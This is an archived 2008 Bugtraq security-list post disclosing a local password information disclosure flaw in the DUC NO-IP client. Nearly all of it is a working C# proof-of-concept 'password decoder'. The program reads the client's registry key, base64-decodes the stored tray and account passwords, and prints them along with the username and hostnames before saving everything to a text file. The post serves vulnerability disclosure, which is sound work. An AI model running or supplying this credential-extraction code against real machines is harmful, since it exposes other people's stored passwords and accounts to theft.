lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 16 Jun 2008 12:27:59 -0000
From: glafkos@...osec.org.uk
To: bugtraq@...urityfocus.com
Subject: DUC NO-IP Local Password Information Disclosure Vulnerability

/* 
 * DUC NO-IP Local Password Information Disclosure
 * Author(s): Charalambous Glafkos
 *            George Nicolaou
 * Date: March 11, 2008
 * Site: http://www.astalavista.com
 * Mail: glafkos@...alavista.com
 *       ishtus@...alavista.com
 *
 * Synopsis: DUC NO-IP is prone to an information disclosure vulnerability due to a design error.
 *           Attackers can exploit this issue to obtain sensitive information including tray password,
 *           web username, password and hostnames that may lead to further attacks.
 *            
 * Note: Vendor has been notified long time ago confirming a design error.
 * Vendor site: http://www.no-ip.com
 *           
 */

using System;
using System.Text;
using System.IO;
using Microsoft.Win32;

namespace getRegistryValue
{
    class getValue
    {
        static void Main()
        {
            getValue details = new getValue();
            String strDUC = details.getDUC();
            Console.WriteLine("\nDUC NO-IP Password Decoder v1.2");
            Console.WriteLine("Author: Charalambous Glafkos");
            Console.WriteLine("Bugs: glafkos@...alavista.com");
            Console.WriteLine(strDUC);

            FileInfo t = new FileInfo("no-ip.txt");
            StreamWriter Tex = t.CreateText();
            Tex.WriteLine(strDUC);
            Tex.Write(Tex.NewLine);
            Tex.Close();
            Console.WriteLine("\nThe file named no-ip.txt is created\n");
        }
        
        private string getDUC()
        {
            RegistryKey ducKey = Registry.LocalMachine;
            ducKey = ducKey.OpenSubKey(@"SOFTWARE\Vitalwerks\DUC", false);
            String TrayPassword = DecodeBytes(ducKey.GetValue("TrayPassword").ToString());
            String Username = ducKey.GetValue("Username").ToString();
            String Password = DecodeBytes(ducKey.GetValue("Password").ToString());
            String Hostnames = ducKey.GetValue("Hosts").ToString();
            String strDUC = "\nTrayPassword: " + TrayPassword
                + "\nUsername: " + Username
                + "\nPassword: " + Password
                + "\nHostnames: " + Hostnames;
            return strDUC;
        }

        public static string DecodeBytes(String encryptedData) 
    {
        Byte[] toDecodeByte = Convert.FromBase64String(encryptedData);
        System.Text.UTF8Encoding encoder = new System.Text.UTF8Encoding();
        System.Text.Decoder utf8Decode = encoder.GetDecoder();
        int charCount = utf8Decode.GetCharCount(toDecodeByte, 0, toDecodeByte.Length);
        Char[] decodedChar = new char[charCount];
        utf8Decode.GetChars(toDecodeByte, 0, toDecodeByte.Length, decodedChar, 0);
        String result = new String(decodedChar);
        return (new string(decodedChar));
    }
  }   
}

Powered by blists - more mailing lists